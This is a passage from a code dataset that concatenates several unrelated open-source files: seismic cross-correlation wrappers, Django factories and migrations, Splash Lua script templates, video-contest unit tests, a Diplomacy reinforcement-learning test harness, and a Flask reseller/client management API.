Compute cross-correlations in the time-domain using C routine.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
used_chans = ~np.isnan(templates).any(axis=1)
utilslib = _load_cdll('libutils')
utilslib.multi_corr.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int, ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS'))]
utilslib.multi_corr.restype = ctypes.c_int
template_len = templates.shape[1]
n_templates = templates.shape[0]
image_len = stream.shape[0]
ccc = np.ascontiguousarray(
np.empty((image_len - template_len + 1) * n_templates), np.float32)
t_array = np.ascontiguousarray(templates.flatten(), np.float32)
utilslib.multi_corr(t_array, template_len, n_templates,
np.ascontiguousarray(stream, np.float32), image_len,
ccc)
ccc[np.isnan(ccc)] = 0.0
ccc = ccc.reshape((n_templates, image_len - template_len + 1))
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
def fftw_xcorr(templates, stream, pads):
"""
Normalised cross-correlation using the fftw library.
Internally this function used double precision numbers, which is definitely
required for seismic data. Cross-correlations are computed as the
inverse fft of the dot product of the ffts of the stream and the reversed,
normalised, templates. The cross-correlation is then normalised using the
running mean and standard deviation (not using the N-1 correction) of the
stream and the sums of the normalised templates.
This python fucntion wraps the C-library written by C. Chamberlain for this
purpose.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
utilslib = _load_cdll('libutils')
utilslib.normxcorr_fftw_1d.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int]
utilslib.normxcorr_fftw_1d.restype = ctypes.c_int
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
template_length = templates.shape[1]
stream_length = len(stream)
n_templates = templates.shape[0]
fftshape = next_fast_len(template_length + stream_length - 1)
# # Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
ccc = np.empty((n_templates, stream_length - template_length + 1),
np.float32)
for i in range(n_templates):
if np.all(np.isnan(norm[i])):
ccc[i] = np.zeros(stream_length - template_length + 1)
else:
ret = utilslib.normxcorr_fftw_1d(
np.ascontiguousarray(norm[i], np.float32), template_length,
np.ascontiguousarray(stream, np.float32), stream_length,
np.ascontiguousarray(ccc[i], np.float32), fftshape)
if ret != 0:
raise MemoryError()
ccc = ccc.reshape((n_templates, stream_length - template_length + 1))
ccc[np.isnan(ccc)] = 0.0
if np.any(np.abs(ccc) > 1.01):
print('Normalisation error in C code')
print(ccc.max())
print(ccc.min())
raise MemoryError()
ccc[ccc > 1.0] = 1.0
ccc[ccc < -1.0] = -1.0
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-3.0 | -4,603,551,828,821,077,000 | 38.683168 | 79 | 0.618596 | false |
jgirardet/unolog | tests/ordonnances/factory.py | 1 | 1288 | import factory
# from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from tests.factories import FacBaseActe
fk = factory.Faker
class FacOrdonnance(FacBaseActe):
class Meta:
model = 'ordonnances.Ordonnance'
ordre = ""
# ligne = GenericRelation(LigneOrdonnance, related_query_name='medicament')
class FacLigneOrdonnance(factory.DjangoModelFactory):
ordonnance = factory.SubFactory(FacOrdonnance)
ald = fk('boolean')
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Override the default ``_create`` with our custom call."""
manager = cls._get_manager(model_class)
# The default would use ``manager.create(*args, **kwargs)``
return manager.new_ligne(**kwargs)
class FacMedicament(FacLigneOrdonnance):
class Meta:
model = Medicament
cip = fk('ean13', locale="fr_fr")
nom = fk('last_name', locale="fr_FR")
posologie = fk('text', max_nb_chars=50, locale="fr_FR")
duree = fk('pyint')
class FacConseil(FacLigneOrdonnance):
class Meta:
model = Conseil
texte = fk('text', max_nb_chars=200, locale="fr_FR")
| gpl-3.0 | 2,254,105,173,301,448,400 | 25.285714 | 81 | 0.677795 | false |
postalXdude/PySplash | py_splash/static.py | 1 | 1346 | LUA_SOURCE = '''
function main(splash)
splash.resource_timeout = splash.args.timeout
{}
local condition = false
while not condition do
splash:wait(splash.args.wait)
condition = splash:evaljs({}{}{})
end
{}
{}
splash:runjs("window.close()")
{}
end
'''
GO = '\tassert(splash:go{}splash.args.url, baseurl=nil, headers={}, http_method="{}", body={}, formdata={}{})' \
.format(*['{}'] * 6)
JS_PIECE = '`{}`, document, null, XPathResult.BOOLEAN_TYPE, null).booleanValue || document.evaluate('
USER_AGENT = '\tsplash:set_user_agent(\'{}\')'
GET_HTML_ONLY = '\tlocal html = splash:html()'
RETURN_HTML_ONLY = '\treturn html'
GET_ALL_DATA = '''
local entries = splash:history()
local last_response = entries[#entries].response
local url = splash:url()
local headers = last_response.headers
local http_status = last_response.status
local cookies = splash:get_cookies()
'''
RETURN_ALL_DATA = '''
return {
url = splash:url(),
headers = last_response.headers,
http_status = last_response.status,
cookies = splash:get_cookies(),
html = splash:html(),
}
'''
PREPARE_COOKIES = '''
splash:init_cookies({}
{}
{})
'''
SET_PROXY = '''
splash:on_request(function(request)
request:set_proxy{}
{}
{}
end)
'''
| mit | 7,171,708,248,713,019,000 | 19.089552 | 112 | 0.595097 | false |
EdwardDesignWeb/grandeurmoscow | main/migrations/0005_auto_20170824_1135.py | 1 | 3162 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-24 11:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20170823_1229'),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438')),
],
options={
'verbose_name': '\u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0439',
},
),
migrations.CreateModel(
name='TypesRooms',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0439',
},
),
migrations.AlterModelOptions(
name='photo',
options={'verbose_name': '\u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e', 'verbose_name_plural': '\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'},
),
migrations.AlterField(
model_name='photo',
name='image',
field=models.ImageField(upload_to=main.models.get_file_path, verbose_name='\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'),
),
migrations.AddField(
model_name='categories',
name='room',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms'),
),
migrations.AddField(
model_name='items',
name='category',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.Categories', verbose_name='\u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f'),
preserve_default=False,
),
migrations.AddField(
model_name='items',
name='room',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms', verbose_name='\u041f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435'),
preserve_default=False,
),
]
| unlicense | -3,458,896,980,396,601,000 | 47.646154 | 225 | 0.622075 | false |
pculture/mirocommunity | localtv/contrib/contests/tests/unit/test_views.py | 1 | 5490 | import datetime
from localtv.contrib.contests.tests.base import BaseTestCase
from localtv.contrib.contests.models import Contest
from localtv.contrib.contests.views import (ContestDetailView,
ContestListingView)
from localtv.models import Video
class ContestDetailViewUnit(BaseTestCase):
def test_context_data__new(self):
contest = self.create_contest(detail_columns=Contest.NEW)
# MySQL times are only accurate to one second, so make sure the times
# are different by a whole second.
now = datetime.datetime.now()
second = datetime.timedelta(seconds=1)
video1 = self.create_video(name='video1',
when_approved=now - second * 2)
video2 = self.create_video(name='video2',
when_approved=now - second)
video3 = self.create_video(name='video3',
when_approved=now)
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['new_videos']),
[video3, video2, video1])
self.assertTrue('random_videos' not in context_data)
self.assertTrue('top_videos' not in context_data)
def test_context_data__random(self):
contest = self.create_contest(detail_columns=Contest.RANDOM)
video1 = self.create_video(name='video1')
video2 = self.create_video(name='video2')
video3 = self.create_video(name='video3')
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertTrue('random_videos' in context_data)
self.assertTrue('new_videos' not in context_data)
self.assertTrue('top_videos' not in context_data)
# Try to test whether the videos are randomly arranged.
random = list(context_data['random_videos'])
contexts = [view.get_context_data(object=contest)
for i in xrange(10)]
self.assertTrue(any([random != list(c['random_videos'])
for c in contexts]))
def test_context_data__top(self):
contest = self.create_contest(detail_columns=Contest.TOP,
allow_downvotes=False)
video1 = self.create_video(name='video1')
video2 = self.create_video(name='video2')
video3 = self.create_video(name='video3')
cv1 = self.create_contestvideo(contest, video1, upvotes=5)
self.create_contestvideo(contest, video2, upvotes=10)
self.create_contestvideo(contest, video3, upvotes=3)
view = ContestDetailView()
view.object = contest
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video1, video3])
self.assertTrue('random_videos' not in context_data)
self.assertTrue('new_videos' not in context_data)
# Downvotes should be ignored if they're disallowed. By adding 6 down
# votes to the video with 5 votes, if the down votes are counted at all
# that video will be in the wrong place.
self.create_votes(cv1, 6, are_up=False)
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video1, video3])
# ... and taken into account otherwise.
contest.allow_downvotes = True
context_data = view.get_context_data(object=contest)
self.assertEqual(list(context_data['top_videos']),
[video2, video3, video1])
class ContestListingViewUnit(BaseTestCase):
def test_get_queryset(self):
contest = self.create_contest()
now = datetime.datetime.now()
second = datetime.timedelta(seconds=1)
video1 = self.create_video(name='video1',
when_approved=now - second * 2)
video2 = self.create_video(name='video2',
when_approved=now - second)
video3 = self.create_video(name='video3',
when_approved=now)
video4 = self.create_video(name='video4',
when_approved=now + second,
status=Video.UNAPPROVED)
self.create_contestvideo(contest, video1)
self.create_contestvideo(contest, video2)
self.create_contestvideo(contest, video3)
self.create_contestvideo(contest, video4)
view = ContestListingView()
view.object = contest
self.assertEqual(list(view.get_queryset()),
[video3, video2, video1])
def test_get(self):
contest = self.create_contest()
view = ContestListingView()
self.assertTrue(view.dispatch(self.factory.get('/'),
pk=contest.pk,
slug=contest.slug))
self.assertEqual(view.object, contest)
| agpl-3.0 | 1,383,522,387,700,707,800 | 42.571429 | 79 | 0.599454 | false |
diplomacy/research | diplomacy_research/models/self_play/algorithms/tests/algorithm_test_setup.py | 1 | 11878 | # ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Generic class to test an algorithm """
import os
import gym
from tornado import gen
from tornado.ioloop import IOLoop
from diplomacy_research.models.datasets.queue_dataset import QueueDataset
from diplomacy_research.models.draw.v001_draw_relu import DrawModel, load_args as load_draw_args
from diplomacy_research.models.gym import AutoDraw, LimitNumberYears, RandomizePlayers
from diplomacy_research.models.self_play.controller import generate_trajectory
from diplomacy_research.models.self_play.reward_functions import DefaultRewardFunction, DEFAULT_PENALTY
from diplomacy_research.models.state_space import TOKENS_PER_ORDER
from diplomacy_research.models.value.v004_board_state_conv import ValueModel, load_args as load_value_args
from diplomacy_research.players import RuleBasedPlayer, ModelBasedPlayer
from diplomacy_research.players.rulesets import easy_ruleset
from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto
from diplomacy_research.utils.proto import read_next_proto, write_proto_to_file
# Constants
HOME_DIR = os.path.expanduser('~')
if HOME_DIR == '~':
raise RuntimeError('Cannot find home directory. Unable to save cache')
class AlgorithmSetup():
""" Tests an algorithm """
def __init__(self, algorithm_ctor, algo_load_args, model_type):
""" Constructor
:param algorithm_ctor: The constructor class for the Algorithm
:param algo_args: The method load_args() for the algorithm
:param model_type: The model type ("order_based", "token_based") of the policy (for caching)
"""
self.saved_game_cache_path = None
self.model_type = model_type
self._algorithm_ctor = algorithm_ctor
self.get_algo_load_args = algo_load_args
self.adapter = None
self.algorithm = None
self.advantage = None
self.reward_fn = DefaultRewardFunction()
self.graph = None
def create_algorithm(self, feedable_dataset, model, hparams):
""" Creates the algorithm object """
self.algorithm = self._algorithm_ctor(feedable_dataset, model, hparams)
@staticmethod
def parse_flags(args):
""" Parse flags without calling tf.app.run() """
define = {'bool': lambda x: bool(x), # pylint: disable=unnecessary-lambda
'int': lambda x: int(x), # pylint: disable=unnecessary-lambda
'str': lambda x: str(x), # pylint: disable=unnecessary-lambda
'float': lambda x: float(x), # pylint: disable=unnecessary-lambda
'---': lambda x: x} # pylint: disable=unnecessary-lambda
# Keeping a dictionary of parse args to overwrite if provided multiple times
flags = {}
for arg in args:
arg_type, arg_name, arg_value, _ = arg
flags[arg_name] = define[arg_type](arg_value)
if arg_type == '---' and arg_name in flags:
del flags[arg_name]
return flags
@staticmethod
def get_policy_model():
""" Returns the PolicyModel """
raise NotImplementedError()
@staticmethod
def get_policy_builder():
""" Returns the Policy's DatasetBuilder """
raise NotImplementedError()
@staticmethod
def get_policy_adapter():
""" Returns the PolicyAdapter """
raise NotImplementedError()
@staticmethod
def get_policy_load_args():
""" Returns the policy args """
return []
@staticmethod
def get_test_load_args():
""" Overrides common hparams to speed up tests. """
return [('int', 'nb_graph_conv', 3, 'Number of Graph Conv Layer'),
('int', 'word_emb_size', 64, 'Word embedding size.'),
('int', 'order_emb_size', 64, 'Order embedding size.'),
('int', 'power_emb_size', 64, 'Power embedding size.'),
('int', 'season_emb_size', 10, 'Season embedding size.'),
('int', 'board_emb_size', 40, 'Embedding size for the board state'),
('int', 'gcn_size', 24, 'Size of graph convolution outputs.'),
('int', 'lstm_size', 64, 'LSTM (Encoder and Decoder) size.'),
('int', 'attn_size', 30, 'LSTM decoder attention size.'),
('int', 'value_embedding_size', 64, 'Embedding size.'),
('int', 'value_h1_size', 16, 'The size of the first hidden layer in the value calculation'),
('int', 'value_h2_size', 16, 'The size of the second hidden layer in the value calculation'),
('bool', 'use_v_dropout', True, 'Use variational dropout (same mask across all time steps)'),
('bool', 'use_xla', False, 'Use XLA compilation.'),
('str', 'mode', 'self-play', 'The RL training mode.')]
def run_tests(self):
""" Run all tests """
IOLoop.current().run_sync(self.run_tests_async)
@gen.coroutine
def run_tests_async(self):
""" Run tests in an asynchronous IO Loop """
from diplomacy_research.utils.tensorflow import tf
self.graph = tf.Graph()
with self.graph.as_default():
yield self.build_algo_and_adapter()
saved_game_proto = yield self.get_saved_game_proto()
yield self.test_clear_buffers()
yield self.test_learn(saved_game_proto)
assert self.adapter.session.run(self.algorithm.version_step) == 0
yield self.test_update()
yield self.test_init()
assert self.adapter.session.run(self.algorithm.version_step) == 1
yield self.test_get_priorities(saved_game_proto)
@gen.coroutine
def test_learn(self, saved_game_proto):
""" Tests the algorithm learn method """
power_phases_ix = self.algorithm.get_power_phases_ix(saved_game_proto, 1)
yield self.algorithm.learn([saved_game_proto], [power_phases_ix], self.advantage)
@gen.coroutine
def test_get_priorities(self, saved_game_proto):
""" Tests the algorithm get_priorities method """
power_phases_ix = self.algorithm.get_power_phases_ix(saved_game_proto, 1)
yield self.algorithm.clear_buffers()
yield self.algorithm.learn([saved_game_proto], [power_phases_ix], self.advantage)
priorities = yield self.algorithm.get_priorities([saved_game_proto], self.advantage)
assert len(priorities) == len(self.algorithm.list_power_phases_per_game.get(saved_game_proto.id, []))
@gen.coroutine
def test_update(self):
""" Tests the algorithm update method """
results = yield self.algorithm.update(memory_buffer=None)
for eval_tag in self.algorithm.get_evaluation_tags():
assert eval_tag in results
assert results[eval_tag]
@gen.coroutine
def test_init(self):
""" Tests the algorithm init method """
yield self.algorithm.init()
@gen.coroutine
def test_clear_buffers(self):
""" Tests the algorithm clear_buffers method """
yield self.algorithm.clear_buffers()
@gen.coroutine
def build_algo_and_adapter(self):
""" Builds adapter """
from diplomacy_research.utils.tensorflow import tf
policy_model_ctor = self.get_policy_model()
dataset_builder_ctor = self.get_policy_builder()
policy_adapter_ctor = self.get_policy_adapter()
extra_proto_fields = self._algorithm_ctor.get_proto_fields()
hparams = self.parse_flags(self.get_policy_load_args()
+ load_value_args()
+ load_draw_args()
+ self.get_algo_load_args()
+ self.get_test_load_args())
# Generating model
dataset = QueueDataset(batch_size=32,
dataset_builder=dataset_builder_ctor(extra_proto_fields=extra_proto_fields))
model = policy_model_ctor(dataset, hparams)
model = ValueModel(model, dataset, hparams)
model = DrawModel(model, dataset, hparams)
model.finalize_build()
self.create_algorithm(dataset, model, hparams)
self.adapter = policy_adapter_ctor(dataset, self.graph, tf.Session(graph=self.graph))
self.advantage = self._algorithm_ctor.create_advantage_function(hparams,
gamma=0.99,
penalty_per_phase=DEFAULT_PENALTY)
# Setting cache path
filename = '%s_savedgame.pbz' % self.model_type
self.saved_game_cache_path = os.path.join(HOME_DIR, '.cache', 'diplomacy', filename)
@gen.coroutine
def get_saved_game_proto(self):
""" Tests the generate_saved_game_proto method """
# Creating players
player = ModelBasedPlayer(self.adapter)
rule_player = RuleBasedPlayer(easy_ruleset)
players = [player, player, player, player, player, player, rule_player]
def env_constructor(players):
""" Env constructor """
env = gym.make('DiplomacyEnv-v0')
env = LimitNumberYears(env, 5)
env = RandomizePlayers(env, players)
env = AutoDraw(env)
return env
# Generating game
saved_game_proto = None
if os.path.exists(self.saved_game_cache_path):
with open(self.saved_game_cache_path, 'rb') as file:
saved_game_proto = read_next_proto(SavedGameProto, file, compressed=True)
if saved_game_proto is None:
saved_game_proto = yield generate_trajectory(players, self.reward_fn, self.advantage, env_constructor)
with open(self.saved_game_cache_path, 'wb') as file:
write_proto_to_file(file, saved_game_proto, compressed=True)
# Validating game
assert saved_game_proto.id
assert len(saved_game_proto.phases) >= 10
# Validating policy details
for phase in saved_game_proto.phases:
for power_name in phase.policy:
nb_locs = len(phase.policy[power_name].locs)
assert (len(phase.policy[power_name].tokens) == nb_locs * TOKENS_PER_ORDER # Token-based
or len(phase.policy[power_name].tokens) == nb_locs) # Order-based
assert len(phase.policy[power_name].log_probs) == len(phase.policy[power_name].tokens)
assert phase.policy[power_name].draw_action in (True, False)
assert 0. <= phase.policy[power_name].draw_prob <= 1.
# Validating rewards
assert saved_game_proto.reward_fn == DefaultRewardFunction().name
for power_name in saved_game_proto.assigned_powers:
assert len(saved_game_proto.rewards[power_name].value) == len(saved_game_proto.phases) - 1
# Returning saved game proto for other tests to use
return saved_game_proto
| mit | 3,197,060,478,943,303,000 | 46.512 | 114 | 0.611635 | false |
inova-tecnologias/jenova | src/jenova/resources/reseller.py | 1 | 14834 | from flask_restful import abort, request
from datetime import datetime
import uuid
from jenova.resources.base import BaseResource, abort_if_obj_doesnt_exist
from jenova.models import (
Client, Reseller, Domain, User,
ClientSchema, ResellerSchema, DomainSchema, Service, ResellerServices
)
from jenova.components import Security
from jenova.components import db
class ResellerListResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListResource, self).__init__(filters)
def get(self):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
resellers = Reseller.query\
.offset(offset)\
.limit(limit)\
.all()
if not resellers:
abort(404, message = 'Could not find any reseller')
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}
class ResellerListByQueryResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListByQueryResource, self).__init__(filters)
def get(self, by_name_query):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 100
if offset > limit or limit > 100:
abort(400, message = 'Wrong offset/limit specified. Max limit permited: 100')
total_records = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.count()
if total_records == 0:
abort(404, message = 'Could not find any reseller using query: %s' % by_name_query)
resellers = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
response_headers = {}
if limit < total_records:
new_offset = limit + 1
new_limit = new_offset + (limit - offset)
response_headers['Location'] = '%s?offset=%s&limit=%s' % (request.base_url, new_offset, new_limit)
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}, 200, response_headers
class ResellerServicesListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerServicesListResource, self).__init__(filters)
class ResellerDomainListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerDomainListResource, self).__init__(filters)
# def get(self, target_reseller):
# reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
def get(self, target_reseller):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
count = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.count()
domains = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.offset(offset)\
.limit(limit)\
.all()
if not domains:
abort(404, message='Could not find any domains')
return {
'response' : {
'domains' : DomainSchema(many=True).dump(domains).data,
'total' : count
}
}
class ResellerResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerResource, self).__init__(filters)
def get(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
return {
'response' : {
'resellers' : ResellerSchema().dump(reseller).data
}
}
def delete(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if reseller.clients.all():
abort(409, message = 'The reseller still have clients')
db.session.delete(reseller)
db.session.commit()
return '', 204
def put(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
self.parser.add_argument('email', type=str)
self.parser.add_argument('company', type=unicode)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('enabled', type=bool)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller.email = reqdata.get('email') or reseller.email
reseller.company = reqdata.get('company') or reseller.company
reseller.phone = reqdata.get('phone') or reseller.phone
if reqdata.get('enabled') != None:
reseller.enabled = reqdata.get('enabled')
# Delete all services from the association proxy
del reseller.services[:]
for svc in reqdata.get('services') or []:
service = abort_if_obj_doesnt_exist('name', svc, Service)
reseller.services.append(service)
db.session.commit()
return '', 204
def post(self, target_reseller):
target_reseller = target_reseller.lower()
if Reseller.query.filter_by(name=target_reseller).first():
abort(409, message='The reseller {} already exists'.format(target_reseller))
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True)
self.parser.add_argument('company', type=unicode, required=True)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('login_name', type=unicode, required=True)
self.parser.add_argument('login', type=str, required=True)
self.parser.add_argument('password', type=str, required=True)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller = Reseller(name = target_reseller,
email = reqdata['email'],
company = reqdata['company'],
)
reseller.phone = reqdata.get('phone')
# associate services to reseller
if reqdata.get('services'):
for service_name in set(reqdata['services']):
service = Service.query.filter_by(name = service_name).first()
if not service:
db.session.rollback()
abort(404, message = 'Could not find service: %s' % service)
reseller_service = ResellerServices(
reseller = reseller,
service = service
)
db.session.add(reseller_service)
db.session.flush()
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
admin = True
)
reseller.user = user
db.session.add(reseller)
db.session.commit()
reseller = Reseller.query.filter_by(name=target_reseller).first()
return {
'response' : {
'reseller_id' : reseller.id,
'user_id' : user.id
}
}, 201
class ClientListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientListResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, **kwargs):
""" Check for access rules:
A global admin must not have any restrictions.
Only an admin must access this resource.
A requester must have access of your own clients
"""
target_reseller = kwargs.get('target_reseller')
if self.is_global_admin: return
if not self.is_admin and not request.method == 'GET':
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, **kwargs):
target_reseller = kwargs.get('target_reseller')
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
by_name_query = kwargs.get('by_name_query') or ''
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
if self.is_global_admin:
clients = Client.query \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
return {
'response' : {
'reseller_id' : None,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
elif self.is_admin:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if by_name_query:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
else:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.offset(offset)\
.limit(limit)\
.all()
else:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
clients = Client.query.filter_by(id = self.request_user_client_id).first()
clients = [clients]
if not clients:
abort(404, message = 'Could not find any clients')
return {
'response' : {
'reseller_id' : reseller.id,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
class ClientResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, target_reseller, target_client):
""" Check for access rules:
A global admin must not have any restrictions.
A requester admin must create and delete clients
A requester must have access to your own clients
"""
if self.is_global_admin: return
# Only admin can create and delete clients
if not self.is_admin and not request.method in ['GET', 'PUT']:
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
client_result = ClientSchema().dump(client)
return {
'response' : {
'client' : client_result.data
}
}
def delete(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
if client.domain.all():
abort(409, message = 'There are still domains associated with this client')
db.session.delete(client)
db.session.commit()
return '', 204
def put(self, target_reseller, target_client):
abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
